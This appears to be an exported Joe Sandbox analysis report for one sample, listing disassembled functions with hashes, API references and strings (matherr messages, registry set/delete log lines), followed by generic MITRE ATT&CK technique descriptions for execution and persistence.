Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 6451bf9a0787ee7e3fbc2e4680b43665db0457fe4742dfdb35c5a895bdf1735a
Instruction ID: 2733b0b0bcb5b81a135af01dda13bef493df3fc4a300cfa4d29f3319fc843d86
Opcode Fuzzy Hash: 6451bf9a0787ee7e3fbc2e4680b43665db0457fe4742dfdb35c5a895bdf1735a
Instruction Fuzzy Hash: 3AF02C66808E8482D311DF28A4006AFB370FF9A399F605227EBC927624DF69D1028710

Function 00007FF7C1AB9F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7C1AB9FDA

Strings

Total loss of significance (TLOSS), xrefs: 00007FF7C1AB9F72
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7C1AB9FCD

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: f0cc35a3023ab0765aad32f209e1640c18de46f0afe3c809ef87c71ae9ddbc4d
Instruction ID: 1ef37cd21dc0a8fecd9a163eaabb75b5f70c20c8cd6bb6cf2b09e6cddc719b5a
Opcode Fuzzy Hash: f0cc35a3023ab0765aad32f209e1640c18de46f0afe3c809ef87c71ae9ddbc4d
Instruction Fuzzy Hash: 52F02866808E8482D311DF28A4006AFB370FF9E399FA05227EBC927665DF6DD1068710

Function 00007FF7C1AB9F69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7C1AB9FDA

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7C1AB9FCD
Partial loss of significance (PLOSS), xrefs: 00007FF7C1AB9F69

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 7fc79935e1c96b175120206bcf42f550eab6264ab818878e534cf198e4de55d6
Instruction ID: 231b791cc3aaee9957863b4e89ab6d8f2cbfd9b099d5604ee09d2ab16713983e
Opcode Fuzzy Hash: 7fc79935e1c96b175120206bcf42f550eab6264ab818878e534cf198e4de55d6
Instruction Fuzzy Hash: 16F02866808E8482D311DF28A4006AFB370FF9A399FA05227EBC927624DF69D1028B10

Function 00007FF7C1AB9F84 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7C1AB9FDA

Strings

Argument singularity (SIGN), xrefs: 00007FF7C1AB9F84
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7C1AB9FCD

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 3caf50f11d581963b8c73ebfee371e78415e78a0bb41e99ac7e1e7c5d0da35c7
Instruction ID: 0946c4b80a21e0bb56518e8ae2c85d25099918d5af36196457847181cca88281
Opcode Fuzzy Hash: 3caf50f11d581963b8c73ebfee371e78415e78a0bb41e99ac7e1e7c5d0da35c7
Instruction Fuzzy Hash: 3CF0FB66808F8482D311DF18A4006ABB371FF9E799F605327EFC927625DF69D1468710

Function 00007FF7C1AB9D26 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9CF5

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9D15
registry_set_value, xrefs: 00007FF7C1AB9D0E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 99640af28f7d5e42eb5dbfc31f0b3563d5e2e68895e8b1d74a9c3510cd1f53b0
Instruction ID: f77b4c551b0dc08c3a4a7bb9821355d57e301fbf8ab5f6928adababf4909870b
Opcode Fuzzy Hash: 99640af28f7d5e42eb5dbfc31f0b3563d5e2e68895e8b1d74a9c3510cd1f53b0
Instruction Fuzzy Hash: 84E065A2A1864680F750FF00B8609BCA210BB80BA4EC00133DD5E076A09EACA989D328

Function 00007FF7C1AB9CD6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9CF5

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9D15
registry_set_value, xrefs: 00007FF7C1AB9D0E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 4e6d1565804c22a665bfade4e9e6dbc149f290daedc0b59019cb7242f4fc810f
Instruction ID: 6e52113683ab7f4046208eb6ab696d316b0fcddf2d3782fc45260885a8475b21
Opcode Fuzzy Hash: 4e6d1565804c22a665bfade4e9e6dbc149f290daedc0b59019cb7242f4fc810f
Instruction Fuzzy Hash: 34E06DA2A1864640F711FF00BC209BCA214EB407A4EC00033DD1E076909EACA689D318

Function 00007FF7C1AB9CE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9CF5

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9D15
registry_set_value, xrefs: 00007FF7C1AB9D0E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 5e363c31e7291c556b444d04a48b444271ae06b21462efffc657dfadcfa4f260
Instruction ID: 34c0505a90c6e1c31a400e56e8b2f250e680734079f501e71d8d76af5052e7c9
Opcode Fuzzy Hash: 5e363c31e7291c556b444d04a48b444271ae06b21462efffc657dfadcfa4f260
Instruction Fuzzy Hash: 1BE06DA2A1864641F710FF00B8109BCA210AB407A4EC00033DD1E476909EACA589D328

Function 00007FF7C1AB9C4F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9CF5

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9D15
registry_set_value, xrefs: 00007FF7C1AB9D0E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 52f7967ad7d3ea4520bf204a5273323589eb95eac63699c98f2bddd83d47c0c1
Instruction ID: 8a9d11554837b9ad8bea4e49625c1552129935ea394e293f2715b66e02deaf01
Opcode Fuzzy Hash: 52f7967ad7d3ea4520bf204a5273323589eb95eac63699c98f2bddd83d47c0c1
Instruction Fuzzy Hash: 72E06DA2A1864640F710BF00BC10ABCA210BB407A0EC00033DD1D076909EACA589D318

Function 00007FF7C1AB9C45 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9CF5

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9D15
registry_set_value, xrefs: 00007FF7C1AB9D0E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: c0f50a01de371026f01078a7e3fa67e47d07c01d698f57e1af9b6f61bfdee31a
Instruction ID: a0d64c8901cb2bc32e115ab767d052fac707609101df478451644c6cafdad52a
Opcode Fuzzy Hash: c0f50a01de371026f01078a7e3fa67e47d07c01d698f57e1af9b6f61bfdee31a
Instruction Fuzzy Hash: 91E06DA2A1864644F710FF00B8209BCA210AB407A5EC00133DD1E076919EACA589D318

Function 00007FF7C1AB9998 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9967

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_del_value, xrefs: 00007FF7C1AB9980
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9987

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: b5bd019dd0bf83654245c40b92904aadd96d1c3966090d27f7e1cfcb4b26eff6
Instruction ID: 6f635f9cc9a1b37edb8f662aaa9a1c46cffca228a92bc46c44edc08042b301bf
Opcode Fuzzy Hash: b5bd019dd0bf83654245c40b92904aadd96d1c3966090d27f7e1cfcb4b26eff6
Instruction Fuzzy Hash: 0DE06DA1A0868780E710BF00B8509BCA214BF507A4E804037DD4E577649EACA585D264

Function 00007FF7C1AB9956 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9967

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_del_value, xrefs: 00007FF7C1AB9980
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9987

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: e089e3e974d44456e3f3c7475c2e7e02398b4e49e340276aeff23f47b426e8ab
Instruction ID: 85bfe76e1f3145904ee903e352b97beb76961eb9e7d3bda732e2d75c8071ce23
Opcode Fuzzy Hash: e089e3e974d44456e3f3c7475c2e7e02398b4e49e340276aeff23f47b426e8ab
Instruction Fuzzy Hash: 0BE092A1A0C68781E710FF40BC109BCE214FF50BA4FC04037DD4D577649EACE584D264

Function 00007FF7C1AB9948 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9967

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_del_value, xrefs: 00007FF7C1AB9980
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9987

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: e2f1209c0628b930416376927d3e8b07767f95333bc7b115f0ddec6875fed09a
Instruction ID: ffa0f22fc83de1f216dd8ffbaa53104a3c58f270221fc24fa31f33f5a1967dc9
Opcode Fuzzy Hash: e2f1209c0628b930416376927d3e8b07767f95333bc7b115f0ddec6875fed09a
Instruction Fuzzy Hash: D1E09AA2A0C68780E711FF00BC109BCE218FF90BA4FC04037DD8E577A49EACE684D264

Function 00007FF7C1AB98C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9967

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_del_value, xrefs: 00007FF7C1AB9980
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9987

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 1647a98ab6f5dbe32d1f5291f3d2ce6e53f674afaf45352e8b91d784a789bfe1
Instruction ID: d42ffc7175be411188c5f56ca80a5b4e0466d2330114ecafe63fa3353b4fad23
Opcode Fuzzy Hash: 1647a98ab6f5dbe32d1f5291f3d2ce6e53f674afaf45352e8b91d784a789bfe1
Instruction Fuzzy Hash: 88E09AA2A0C68780E710BF00FC10ABCE218FF90BA0FC04037DD8D577A49EACE588D264

Function 00007FF7C1AB98B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9967

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_del_value, xrefs: 00007FF7C1AB9980
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9987

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: d51e24225b9ee83d6d96fe7a7a25a0d9b23eded9cce2d7450df1aec798d1e490
Instruction ID: e6fe8da08ac69c0697b5ddce83765aab10181caee78ab738fed29be57190086a
Opcode Fuzzy Hash: d51e24225b9ee83d6d96fe7a7a25a0d9b23eded9cce2d7450df1aec798d1e490
Instruction Fuzzy Hash: BFE09AA2A0C68B80E710FF00BC109BCE218FF90BA4FC04037DD8E577A59EACE584D264

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

